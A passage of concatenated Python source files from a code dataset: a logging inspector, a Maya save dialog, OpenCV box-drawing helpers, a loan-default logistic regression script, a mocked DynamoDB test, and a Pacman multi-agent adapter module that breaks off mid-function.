0:\n res.append(('\\\\n', Text.subtle))\n if len(line) + length < limit:\n res.append((line, style))\n length += len(line)\n else:\n res.append((line[:limit - length], style))\n res.append((' ...', Text.warning))\n break\n\n return res\n\n def _get_value_line(self, value: any):\n if isinstance(value, str):\n return [('\"', Text.subtle)] + self._shrink(value) + [('\"', Text.subtle)]\n elif numpy is not None and isinstance(value, numpy.ndarray):\n return [*self._format_tensor(self._render_tensor(value, new_line=''), limit=80)]\n elif torch is not None and isinstance(value, torch.Tensor):\n return [*self._format_tensor(self._render_tensor(value, new_line=''), limit=80)]\n\n s = str(value)\n return self._shrink(s)\n\n def _log_key_value(self, items: List[Tuple[any, any]], is_show_count=True):\n max_key_len = 0\n for k, v in items:\n max_key_len = max(max_key_len, len(str(k)))\n\n count = 0\n for k, v in items:\n count += 1\n spaces = \" \" * (max_key_len - len(str(k)))\n s = self._get_value_line(v)\n self.__logger.log([(f\"{spaces}{k}: \", Text.key)] +\n self._get_value_line(v))\n\n if is_show_count:\n self.__logger.log([\n \"Total \",\n (str(count), Text.meta),\n \" item(s)\"])\n\n def info(self, *args, **kwargs):\n if len(args) == 0:\n self._log_key_value([(k, v) for k, v in kwargs.items()], False)\n elif len(args) == 1:\n assert len(kwargs.keys()) == 0\n arg = args[0]\n if type(arg) == list:\n self._log_key_value([(i, v) for i, v in enumerate(arg)])\n elif type(arg) == dict:\n keys = list(arg.keys())\n keys.sort()\n self._log_key_value([(k, arg[k]) for k in keys])\n else:\n self.__logger.log(self._get_value_full(arg))\n else:\n assert len(kwargs.keys()) == 0\n self._log_key_value([(i, v) for i, v in enumerate(args)], False)\n","sub_path":"labml/internal/logger/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"365680931","text":"\"\"\"\n\nThis is lifted directoy out of the WesternX key_base repo. Please be very\ncareful in changing this until our tools have migrated.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport os\nimport sys\n\nimport maya.cmds as cmds\n\nfrom .widget import Dialog\n\n\ndialog = None\n\ndef __before_reload__(): \n if dialog:\n dialog.close()\n\n\nclass MayaDialog(Dialog):\n \n def __init__(self, parent=None):\n super(MayaDialog, self).__init__({\n 'workspace': cmds.workspace(q=True, rootDirectory=True) or None,\n 'filename': cmds.file(q=True, sceneName=True) or None,\n 'warning': self._warning,\n 'error': self._error,\n 'extension': '.mb',\n }, parent)\n \n def _warning(self, message):\n cmds.warning(message)\n\n def _error(self, message):\n cmds.confirmDialog(title='Scene Name Error', message=message, icon='critical')\n cmds.error(message)\n \n def _check_overwrite_safety(self, path):\n \n # Good to go if it doesn't exist.\n basic = super(MayaDialog, self)._check_overwrite_safety(path)\n if basic:\n return True\n \n # Ask the user.\n kwargs = dict(\n icon='warning',\n button=['Yes', 'No'],\n cancelButton='No',\n defaultButton='No',\n )\n message = \"%s already exists.\\nDo you want to replace it?\" % os.path.basename(path)\n if sys.platform.startswith('darwin'):\n kwargs['title'] = message\n else:\n kwargs['title'] = 'Save As'\n kwargs['message'] = message\n return cmds.confirmDialog(**kwargs) == 'Yes'\n \n def _save(self, path):\n cmds.file(rename=path)\n cmds.file(save=True, type='mayaBinary')\n\n\ndef run():\n \n # Hold onto a reference so that it doesn't automatically close.\n global dialog\n \n if dialog:\n dialog.close()\n \n dialog = MayaDialog()\n dialog.show()\n\n","sub_path":"sgfs/ui/scene_name/maya.py","file_name":"maya.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152283901","text":"import colorsys\r\nimport numpy as np\r\nimport cv2\r\nfrom unidecode import unidecode\r\n\r\n# Inspired by https://github.com/hhk7734/tensorflow-yolov4\r\n\r\n_MAX_CLASSES = 14 * 6\r\n_HSV = [(x / _MAX_CLASSES, 1.0, 1.0) for x in range(int(_MAX_CLASSES * 1.2))]\r\n_COLORS = [colorsys.hsv_to_rgb(*x) for x in _HSV]\r\n_COLORS = [(int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)) for x in _COLORS]\r\n_BBOX_COLORS = []\r\nfor i in range(_MAX_CLASSES):\r\n # 0 14 28 42 56 70 1 15 29 43 57 71 2 ...\r\n _BBOX_COLORS.append(_COLORS[14 * (i % 6) + (i // 6)])\r\n\r\ndef draw_bboxes_without_text(\r\n image: np.ndarray, bboxes: np.ndarray\r\n):\r\n \"\"\"\r\n @parma `image`: Dim(height, width, channel)\r\n @parma `bboxes`\r\n Dim(-1, (x_min, y_min, x_max, y_max))\r\n @return drawn_image\r\n Usage:\r\n image = draw_bboxes(image, bboxes)\r\n \"\"\"\r\n height, width, _ = image.shape\r\n image = np.copy(image)\r\n\r\n # Draw bboxes\r\n for bbox_id, bbox in enumerate(bboxes):\r\n \r\n left = int(bbox[0]) # x_min\r\n top = int(bbox[1]) # y_min\r\n right = int(bbox[2]) # x_max\r\n bottom = int(bbox[3]) # y_max\r\n \r\n color = (255, 0, 0)\r\n\r\n cv2.rectangle(image, (left, top), (right, bottom), color, 1)\r\n return image\r\n \r\ndef draw_bboxes(\r\n image: np.ndarray, bboxes: np.ndarray, probs: np.ndarray, names: np.ndarray\r\n):\r\n \"\"\"\r\n @parma `image`: Dim(height, width, channel)\r\n @parma `bboxes`\r\n Dim(-1, (x_min, y_min, x_max, y_max))\r\n @parma `probs`\r\n Dim(-1,)\r\n @parma `names`\r\n Dim(-1,)\r\n @return drawn_image\r\n Usage:\r\n image = yolo.draw_bboxes(image, bboxes, probs, names)\r\n \"\"\"\r\n height, width, _ = image.shape\r\n image = np.copy(image)\r\n name_ids = np.unique(names)\r\n\r\n # Draw bboxes\r\n for bbox_id, bbox in enumerate(bboxes):\r\n \r\n left = int(bbox[0]) # x_min\r\n top = int(bbox[1]) # y_min\r\n right = int(bbox[2]) # x_max\r\n bottom = int(bbox[3]) # y_max\r\n\r\n font_size = 0.4\r\n font_thickness = 1\r\n \r\n # find name id, prob and set color\r\n name_id = np.where(np.array(name_ids) == names[bbox_id])[0][0]\r\n prob = probs[bbox_id]\r\n color = _BBOX_COLORS[name_id%_MAX_CLASSES]\r\n\r\n # Get text size\r\n bbox_text = \"{}: {:.1%}\".format(names[bbox_id], prob)\r\n t_w, t_h = cv2.getTextSize(bbox_text, 0, font_size, font_thickness)[0]\r\n t_h += 3\r\n\r\n # Draw box\r\n if top < t_h:\r\n top = t_h\r\n if left < 1:\r\n left = 1\r\n if bottom >= height:\r\n bottom = height - 1\r\n if right >= width:\r\n right = width - 1\r\n\r\n cv2.rectangle(image, (left, top), (right, bottom), color, 1)\r\n\r\n # Draw text box\r\n cv2.rectangle(image, (left, top), (left + t_w, top - t_h), color, -1)\r\n\r\n # Draw text\r\n cv2.putText(\r\n image,\r\n unidecode(bbox_text), # OpenCV does not handle ~, ^, ´, etc..\r\n (left, top - 2),\r\n cv2.FONT_HERSHEY_SIMPLEX,\r\n font_size,\r\n (\r\n 255 - color[0],\r\n 255 - color[1],\r\n 255 - color[2],\r\n ),\r\n font_thickness,\r\n lineType=cv2.LINE_AA,\r\n )\r\n\r\n return image","sub_path":"tasks/cv-ocr/draws.py","file_name":"draws.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"423360467","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 1 17:54:30 2018\r\n\r\n@author: suvanjeet\r\n\"\"\"\r\n\r\n#%%\r\n# June 2007 to May 2015 - training data, from June 2015 to Dec 2015 Testing data\r\n# June 2007 to May 2015 - training data, from June 2015 to Dec 2015 Testing data\r\ntest_month = ['Jun-2015', 'Jul-2015', 'Aug-2015', 'Sep-2015', 'Oct-2015', 'Nov-2015', 'Dec-2015']\r\nTest_data = df2.loc[df2['issue_d'].isin(test_month)]\r\nTrain_data = df2.loc[~df2['issue_d'].isin(test_month)]\r\n#%%\r\nTest_data = Test_data.drop('issue_d', axis=1)\r\nTrain_data = Train_data.drop('issue_d', axis=1)\r\n\r\nTest_data.shape[0]+Train_data.shape[0]\r\ndf.shape[0]\r\n#%%\r\nX_train= pd.DataFrame(Train_data.values[:,:-1])\r\ny_train = pd.DataFrame(Train_data.values[:,-1])\r\n\r\nX_test= pd.DataFrame(Test_data.values[:,:-1])\r\ny_test = pd.DataFrame(Test_data.values[:,-1])\r\n\r\n#X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3, random_state = 10)\r\n#%%\r\nfrom sklearn.preprocessing import StandardScaler\r\nscaler = StandardScaler()\r\nscaler = scaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n#%%\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\r\n\r\ndef fit_and_evaluate(model): \r\n # Train the model\r\n model.fit(X_train, y_train) \r\n # Make predictions and evalute\r\n model_pred = model.predict(X_test)\r\n model_acc = model.score(X_test, y_test) \r\n # Return the performance metric\r\n return model_acc\r\n\r\nlr = LogisticRegression()\r\n'''lr = RandomForestClassifier()\r\nlr = GradientBoostingClassifier()'''\r\nlr_acc = fit_and_evaluate(lr)\r\nprint('Linear Regression Classifier on the test set: ACC = %0.6f' % lr_acc)\r\n#%%\r\nfrom sklearn.metrics import classification_report\r\nmodel1 = lr.fit(X_train, y_train)\r\ny_pred = model1.predict(X_test)\r\nclassification_report(y_test, y_pred)\r\n\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report\r\ncfm=confusion_matrix(y_test,y_pred)\r\nprint(cfm) # to print confusion matrix , classification details\r\ny_pred_prob= lr.predict_proba(X_test)\r\nprint(y_pred_prob)\r\n\r\n#%%\r\nprint(\"classification report\")\r\n\r\nprint(classification_report(y_test,y_pred))\r\n\r\n\r\n#%%\r\n\r\nplt.figure(figsize=(9,9))\r\nsns.heatmap(cfm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\r\nplt.ylabel('Actual label');\r\nplt.xlabel('Predicted label');\r\nall_sample_title = 'Accuracy Score: {0}'.format(score)\r\nplt.title(all_sample_title, size = 15);\r\n#%%\r\n# store the predicted probabilities\r\n\r\n'''y_pred_prob= lr.predict_proba(X_test)\r\nprint(y_pred_prob)\r\n# for loopfor tuning'''\r\n\r\n#%%\r\n\r\nfor a in np.arange(0,1,0.05):\r\n predict_mine= np.where(y_pred_prob[:,1]>a,1,0)\r\n cfm= confusion_matrix(y_test,predict_mine)\r\n total_err=cfm[0,1]+cfm[1,0]\r\n print('Errors at threshould',round(a,2),\" : \", total_err, \", type 2 error-\",cfm[1,0], \", type 1 error: \",cfm[0,1])\r\n\r\n\r\n#%%\r\ny_pred_class=[]\r\nfor value in y_pred_prob[:,0]:\r\n if value >0.5: #it has taken the weightage for col 0 in y_pred_prob\r\n y_pred_class.append(0)\r\n else:\r\n y_pred_class.append(1)\r\n# 0.45 is good as errors are low and the type 2 error are also less\r\n#%%\r\nfrom sklearn import metrics\r\n\r\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred_class)\r\nauc = metrics.auc(fpr,tpr)\r\nprint(auc)\r\nprint(fpr)\r\nprint(tpr)\r\nprint(threshold)\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.title('Receiver Operating Characteristic')\r\nplt.plot(fpr, tpr, 'b', label = auc)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\n\r\nplt.show()\r\n\r\n#%%\r\nfrom sklearn import metrics\r\n\r\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred_prob[:,1])\r\nauc = metrics.auc(fpr,tpr)\r\nprint(auc)\r\n\r\n \r\n\r\nimport matplotlib.pyplot as plt\r\nplt.title('Receiver Operating Characteristic')\r\nplt.plot(fpr, tpr, 'b', label = auc)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\n\r\nplt.show()\r\n#%%\r\n'''plt.figure(figsize=(9,9))\r\nsns.heatmap(cfm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\r\nplt.ylabel('Actual label');\r\nplt.xlabel('Predicted label');\r\nall_sample_title = 'Accuracy Score: {0}'.format(score)\r\nplt.title(all_sample_title, size = 15);'''\r\n#%%\r\nclassifier=(LogisticRegression())\r\n\r\nfrom sklearn import cross_validation\r\n#performing kfold_cross_validation\r\nkfold_cv=cross_validation.KFold(n=len(X_train),n_folds=10)\r\nprint(kfold_cv)\r\n\r\n#running the model using scoring metric as accuracy\r\nkfold_cv_result=cross_validation.cross_val_score(estimator=classifier,X=X_train,y=y_train, cv=kfold_cv)\r\nprint(kfold_cv_result)\r\n\r\n#%%\r\n#finding the mean\r\nprint(kfold_cv_result.mean())\r\n#%%\r\n''' heat map before vif(multi colinearity)\r\ngrade - default ind\r\nemp_title default ind\r\naddr_state - default ind\r\npurpose - default'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"project_final_part1.py","file_name":"project_final_part1.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305517247","text":"import boto3\nfrom flask import current_app\nfrom moto import mock_dynamodb2\n\nfrom app.data_models.app_models import QuestionnaireState\nfrom app.storage.dynamodb import Dynamodb\nfrom app.storage.errors import ItemAlreadyExistsError\nfrom app.storage.storage import StorageModel\nfrom tests.app.app_context_test_case import AppContextTestCase\n\n\nclass TestDynamo(AppContextTestCase):\n def setUp(self):\n self._ddb = mock_dynamodb2()\n self._ddb.start()\n\n super().setUp()\n\n client = boto3.resource(\"dynamodb\", endpoint_url=None)\n self.ddb = Dynamodb(client)\n\n for config in StorageModel.TABLE_CONFIG_BY_TYPE.values():\n table_name = current_app.config[config[\"table_name_key\"]]\n if table_name:\n client.create_table( # pylint: disable=no-member\n TableName=table_name,\n AttributeDefinitions=[\n {\"AttributeName\": config[\"key_field\"], \"AttributeType\": \"S\"}\n ],\n KeySchema=[\n {\"AttributeName\": config[\"key_field\"], \"KeyType\": \"HASH\"}\n ],\n ProvisionedThroughput={\n \"ReadCapacityUnits\": 1,\n \"WriteCapacityUnits\": 1,\n },\n )\n\n def tearDown(self):\n super().tearDown()\n\n self._ddb.stop()\n\n def test_get_update(self):\n self._assert_item(None)\n self._put_item(1)\n self._assert_item(1)\n self._put_item(2)\n self._assert_item(2)\n\n def test_dont_overwrite(self):\n self._put_item(1)\n with self.assertRaises(ItemAlreadyExistsError):\n self._put_item(1, overwrite=False)\n\n def test_delete(self):\n self._put_item(1)\n self._assert_item(1)\n model = QuestionnaireState(\"someuser\", \"data\", \"ce_sid\", 1)\n self.ddb.delete(model)\n self._assert_item(None)\n\n def _assert_item(self, version):\n item = self.ddb.get(QuestionnaireState, \"someuser\")\n actual_version = item.version if item else None\n self.assertEqual(actual_version, version)\n\n def _put_item(self, version, overwrite=True):\n model = QuestionnaireState(\"someuser\", \"data\", \"ce_sid\", version)\n self.ddb.put(model, overwrite)\n","sub_path":"tests/app/storage/test_dynamodb.py","file_name":"test_dynamodb.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571968197","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Define the agents.\n\nAttributes:\n DEFAULT_NOISE: The default noise, 0.\n NOISE: The noise value, 0.\n GHOST_ACTIONS: List of ghost actions, [Directions.NORTH, Directions.SOUTH,\n Directions.EAST, Directions.WEST].\n PACMAN_ACTIONS: List of pacman actions, GHOST_ACTIONS + [Directions.STOP].\n PACMAN_INDEX: The pacman index. 0\n\nTo create a new Pacman agent just follow these steps:\n\n 1) First create your new Pacman class and define your choose_action\n function in the agents.py archive. This is going to be how your\n pac-man behave.\n\n 2) Then in the adapter.py archive in the Adapter class you need to add your\n new agent in the setup Pacman agent list to make it acceptable and add this\n name in the raise ValueError list of acceptable agents. Example:\n\n elif pacman_agent == 'your_pacman_agent_name':\n self.pacman_class = agents.Your_pacman_Class\n else:\n raise ValueError('Pac-Man agent must be ai, random,\n eater or your_pacman_agent_name.')\n\n 3) To finish you need to change the Get_Adapter function in\n cliparser.py archive to accept your agent. Add 'your_pacman_agent_name'\n in choices of group.add_argument pacman-agent.\n\n 4) Now you can run the simulator using your new agent. To do it you\n just need to inicialize the adapter.py using the -pacman-agent\n 'your_pacman_agent_name' flag.\n\"\"\"\n\nimport random\n\nfrom berkeley.game import Agent as BerkeleyGameAgent, Directions\n\nimport behaviors\nimport features\nimport learning\nimport Queue\n\nfrom communication import (ZMQMessengerBase, RequestGameStartMessage,\n RequestProbabilityMapMessage,\n StateMessage, ProbabilityMapMessage,\n RequestLearnMessage, SharedLearnMessage,\n ProbabilityMapMSEMessage, MSEMessage,)\n\n__author__ = \"Matheus Portela and Guilherme N. Ramos\"\n__credits__ = [\"Matheus Portela\", \"Guilherme N. Ramos\", \"Renato Nobre\",\n \"Pedro Saman\"]\n__maintainer__ = \"Guilherme N. Ramos\"\n__email__ = \"gnramos@unb.br\"\n\n# Default settings\nDEFAULT_NOISE = 0\n\n# Global variable\nNOISE = 0\n\nGHOST_ACTIONS = [Directions.NORTH, Directions.SOUTH, Directions.EAST,\n Directions.WEST]\nPACMAN_ACTIONS = GHOST_ACTIONS + [Directions.STOP]\nPACMAN_INDEX = 0\n\n###############################################################################\n# AdapterAgents #\n###############################################################################\n\n\nclass AdapterAgent(object, BerkeleyGameAgent):\n \"\"\"Communicating client for game adapter.\n\n Communicate client to the BerkeleyGameAgent for the gme adapter.\n\n Attributes:\n agent_id: The identifier of the agent.\n client: A client instance of ZMQMessengerBase.\n previous_action: Directions.STOP.\n test_mode: Test mode is set to 'False'.\n \"\"\"\n\n def __init__(self, agent_id, client):\n \"\"\"Constructor method for AdapterAgent Class.\n\n Initiate BerkeleyGameAgent\n\n Args:\n agent_id: The identifier of the agent.\n client: A client instance of ZMQMessengerBase\n Raises:\n ValueError: Invalid Client\n \"\"\"\n BerkeleyGameAgent.__init__(self, agent_id)\n\n self.agent_id = agent_id\n\n if not isinstance(client, ZMQMessengerBase):\n raise ValueError('Invalid client')\n\n self.client = client\n\n self.previous_action = Directions.STOP\n\n self.test_mode = False\n\n self.agentRealPosition = (0, 0)\n\n self.simulationCount = 1\n\n def __noise_error__(self):\n \"\"\"Return the noise from the noise interval.\n\n Return:\n Random noise.\n \"\"\"\n noiseError = random.randrange(-NOISE, NOISE + 1)\n # print noiseError\n return noiseError\n\n def calculate_reward(self, current_score):\n \"\"\"Base calculate reward method.\n\n Should be overwrited by a calculate_reward method inside a AdapterAgent\n subclass\n\n Args:\n current_score: The current score from a state.\n Raise:\n NotImplementedError: Communicating agent must calculate score.\n \"\"\"\n raise NotImplementedError('Communicating agent must calculate score')\n\n def communicate(self, msg):\n \"\"\"Send a given message and return a message requested.\n\n Args:\n msg: A message for communication\n Returns:\n A message requested to ZMQMessengerBase.\n \"\"\"\n # print msg\n self.client.send(msg)\n return self.client.receive()\n\n def create_state_message(self, state):\n \"\"\"Create a message.\n\n Create a message that contains agent_id, agent_positions,\n food_positions fragile_agents, wall_positions, legal_actions, reward,\n executed_action and test_mode.\n\n Args:\n state: A state of the game.\n Returns:\n msg: A message containing agent_id, agent_positions, food_positions\n fragile_agents, wall_positions, legal_actions, reward,\n executed_action and test_mode.\n \"\"\"\n agent_positions = {}\n\n pos = state.getPacmanPosition()\n real_position = state.getPacmanPosition()\n pos_y = pos[::-1][0]\n pos_x = pos[::-1][1]\n real_position = (pos_y, pos_x)\n pos_y = pos[::-1][0] + self.__noise_error__()\n pos_x = pos[::-1][1] + self.__noise_error__()\n agent_positions[PACMAN_INDEX] = (pos_y, pos_x)\n\n for id_, pos in enumerate(state.getGhostPositions()):\n pos_y = pos[::-1][0] + self.__noise_error__()\n pos_x = pos[::-1][1] + self.__noise_error__()\n agent_positions[id_ + 1] = (pos_y, pos_x)\n\n food_positions = []\n for x, row in enumerate(state.getFood()):\n for y, is_food in enumerate(row):\n if is_food:\n food_positions.append((y, x))\n\n fragile_agents = {}\n for id_, s in enumerate(state.data.agentStates):\n fragile_agents[id_] = 1.0 if s.scaredTimer > 0 else 0.0\n\n wall_positions = []\n for x, row in enumerate(state.getWalls()):\n for y, is_wall in enumerate(row):\n if is_wall:\n wall_positions.append((y, x))\n\n reward = self.calculate_reward(state.getScore())\n self.previous_score = state.getScore()\n\n msg = StateMessage(agent_id=self.agent_id,\n agent_positions=agent_positions,\n food_positions=food_positions,\n fragile_agents=fragile_agents,\n wall_positions=wall_positions,\n legal_actions=state.getLegalActions(self.agent_id),\n reward=reward,\n executed_action=self.previous_action,\n test_mode=self.test_mode,\n realPosition=real_position)\n\n return msg\n\n def enable_learn_mode(self):\n \"\"\"Enable Learn Mode.\"\"\"\n self.test_mode = False\n\n def enable_test_mode(self):\n \"\"\"Enable Test Mode.\"\"\"\n self.test_mode = True\n\n def getAction(self, state):\n \"\"\"Get an action from directions.\n\n Args:\n state: A state of the game.\n Returns:\n An action from Directions.\n \"\"\"\n msg = self.create_state_message(state)\n reply_msg = self.communicate(msg)\n\n self.previous_action = reply_msg.action\n\n if reply_msg.action not in state.getLegalActions(self.agent_id):\n self.invalid_action = True\n return self.act_when_invalid(state)\n else:\n self.invalid_action = False\n return reply_msg.action\n\n def start_game(self, layout):\n \"\"\"Set the start settings for the game agent.\n\n Args:\n layout: A game layout.\n \"\"\"\n self.previous_score = 0\n self.previous_action = Directions.STOP\n msg = RequestGameStartMessage(agent_id=self.agent_id,\n map_width=layout.width,\n map_height=layout.height)\n self.communicate(msg)\n\n def update(self, state):\n \"\"\"Create a state message from the current state.\n\n Create a state message from the current state and communicate.\n\n Args:\n state: A state of the game.\n \"\"\"\n msg = self.create_state_message(state)\n self.communicate(msg)\n\n\nclass PacmanAdapterAgent(AdapterAgent):\n \"\"\"The AdapterAgent for the Pacman Classes.\"\"\"\n\n def __init__(self, client):\n \"\"\"Extend the Constructor method from the AdapterAgent superclass.\n\n Args:\n client: A client instance of ZMQMessengerBase\n \"\"\"\n super(PacmanAdapterAgent, self).__init__(agent_id=PACMAN_INDEX,\n client=client)\n\n \"\"\"Todo:\n Is this ever used?\n \"\"\"\n def act_when_invalid(self, state):\n \"\"\"Action when there are no other valid actions.\n\n Args:\n state: The current state.\n Returns:\n Directions.STOP: The pacman stand still.\n \"\"\"\n return Directions.STOP\n\n def calculate_reward(self, current_score):\n \"\"\"Calculate the reward.\n\n Args:\n current_score: The current score of the agent.\n Returns:\n The curent_score - previous_score.\n \"\"\"\n return current_score - self.previous_score\n\n\nclass GhostAdapterAgent(AdapterAgent):\n \"\"\"The AdapterAgent for the Ghosts Classes.\n\n Attributes:\n previous_action: The previous action, defaul is Directions.NORTH.\n \"\"\"\n\n def __init__(self, agent_id, client, comm, mse):\n \"\"\"Extend the Constructor method from the AdapterAgent superclass.\n\n Args:\n agent_id: The identifier of the agent.\n client: A client instance of ZMQMessengerBase.\n \"\"\"\n super(GhostAdapterAgent, self).__init__(agent_id, client)\n\n self.previous_action = Directions.NORTH\n self.comm = comm\n self.mse = mse\n # self.actions = GHOST_ACTIONS\n\n \"\"\"Todo:\n Is this ever used?\n \"\"\"\n # def act_when_invalid(self, state):\n # return random.choice(state.getLegalActions(self.agent_id))\n\n def __get_probability_map__(self, agent_id):\n \"\"\"Request the agent probability map.\n\n Args:\n agent: The agent to get the map.\n \"\"\"\n msg = RequestProbabilityMapMessage(agent_id)\n reply_msg = super(GhostAdapterAgent, self).communicate(msg)\n return reply_msg.pm\n\n def __load_probabilities_maps__(self, agent, pm):\n \"\"\"Set the probability maps back to the agents.\"\"\"\n msg = ProbabilityMapMessage(agent_id=agent, probability_map=pm)\n self.client.send(msg)\n return self.client.receive()\n\n def __load_probabilities_maps_mse__(self, agent, pm):\n \"\"\"Set the probability maps back to the agents.\"\"\"\n msg = ProbabilityMapMSEMessage(agent_id=agent, probability_map=pm)\n self.client.send(msg)\n return self.client.receive()\n\n def calculate_reward(self, current_score):\n \"\"\"Calculate the reward.\n\n Args:\n current_score: The current score of the agent.\n Returns:\n The previous_score - current_score.\n \"\"\"\n return self.previous_score - current_score\n\n def __get_learn__(self, agent_id, reward):\n \"\"\"Request the agent probability map.\n\n Args:\n agent: The agent to get the map.\n \"\"\"\n msg = RequestLearnMessage(agent_id, reward)\n reply_msg = super(GhostAdapterAgent, self).communicate(msg)\n return reply_msg\n\n def __load_learn__(self, agent, pb, reward, state):\n \"\"\"Set the probability maps back to the agents.\"\"\"\n msg = SharedLearnMessage(agent_id=agent, previous_behavior=pb,\n reward=reward, state=state)\n self.client.send(msg)\n return self.client.receive()\n\n def getAction(self, state):\n \"\"\"Get an action from directions.\n\n Args:\n state: A state of the game.\n\n Returns:\n An action from Directions.\n \"\"\"\n msg = self.create_state_message(state)\n reply_msg = self.communicate(msg)\n\n self.previous_action = reply_msg.action\n\n if self.mse is True:\n msg = MSEMessage(agent_id=self.agent_id)\n self.client.send(msg)\n self.client.receive()\n\n if self.comm == 'pm':\n pm_map = self.__get_probability_map__(self.agent_id)\n self.__load_probabilities_maps__(self.agent_id, pm_map)\n elif self.comm == 'mse':\n pm_map = self.__get_probability_map__(self.agent_id)\n self.__load_probabilities_maps_mse__(self.agent_id, pm_map)\n elif self.comm == 'sharedLearn':\n msg = self.__get_learn__(self.agent_id, msg.reward)\n self.__load_learn__(msg.agent_id, msg.previous_behavior,\n msg.reward, msg.state)\n elif self.comm == 'both':\n pm_map = self.__get_probability_map__(self.agent_id)\n self.__load_probabilities_maps__(self.agent_id, pm_map)\n\n msg = self.__get_learn__(self.agent_id, msg.reward)\n self.__load_learn__(msg.agent_id, msg.previous_behavior,\n msg.reward, msg.state)\n\n if reply_msg.action not in state.getLegalActions(self.agent_id):\n self.invalid_action = True\n return self.act_when_invalid(state)\n else:\n self.invalid_action = False\n return reply_msg.action\n\n###############################################################################\n# #\n###############################################################################\n\n###############################################################################\n# ControllerAgents #\n###############################################################################\n\n\nclass ControllerAgent(object):\n \"\"\"Autonomous agent for game controller.\n\n Attributes:\n agent_id: The identifier of the agent.\n \"\"\"\n\n def __init__(self, agent_id):\n \"\"\"Contructor method for the ControllerAgent.\n\n Args:\n agent_id: The identifier of the agent.\n \"\"\"\n self.agent_id = agent_id\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Select an action to be executed by the agent.\n\n This is a base choose_action function and should be overwrited in your\n agent subclass. When implement should return a Direction for the agent\n to follow (NORTH, SOUTH, EAST, WEST or STOP).\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n\n Raises:\n NotImplementedError: Agent must implement choose_action\n \"\"\"\n raise NotImplementedError('Agent must implement choose_action.')\n\n\nclass PacmanAgent(ControllerAgent):\n \"\"\"A Base PacmanAgent.\n\n Attributes:\n actions: List of pacman actions.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the Constructor from the ControllerAgent superclass.\n\n Args:\n agent_id: The agent identifier.\n ally_ids: The identifier of the allies.\n enemy_ids: The identifier of the enemies.\n \"\"\"\n super(PacmanAgent, self).__init__(agent_id)\n self.actions = PACMAN_ACTIONS\n\n\nclass GhostAgent(ControllerAgent):\n \"\"\"A Base GhostAgent.\n\n Attributes:\n actions: List of ghosts actions.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the Constructor from the ControllerAgent superclass.\n\n Args:\n agent_id: The agent identifier.\n ally_ids: The identifier of the allies.\n enemy_ids: The identifier of the enemies.\n \"\"\"\n super(GhostAgent, self).__init__(agent_id)\n self.actions = GHOST_ACTIONS\n\n\nclass RandomPacmanAgent(PacmanAgent):\n \"\"\"Agent that randomly selects an action.\"\"\"\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Choose a random action.\n\n If there is a legal action choose a random action\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Random action\n \"\"\"\n if len(legal_actions) > 0:\n return random.choice(legal_actions)\n\n\nclass RandomPacmanAgentTwo(PacmanAgent):\n \"\"\"Random kind of PacmanAgent.\n\n This is not a complete random agent, it follows a set of rules. Those rules\n are well detailed in the procedure of choose the action.\n \"\"\"\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Choose a random action.\n\n Choose a random action and does the same until it reaches a wall or\n have more than three possible moves. If the more than three\n possiblities is True the agent have twice the chance of continue to\n follow the same direction.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Random action\n \"\"\"\n if action == 'Stop' or action not in legal_actions:\n if 'Stop' in legal_actions:\n legal_actions.remove('Stop')\n if len(legal_actions) > 0:\n return random.choice(legal_actions)\n else:\n if len(legal_actions) > 3:\n if len(legal_actions) == 4:\n number = random.choice([1, 2, 3, 4, 5])\n else:\n number = random.choice([1, 2, 3, 4, 5, 6])\n if number == 1 or number == 2:\n return action\n 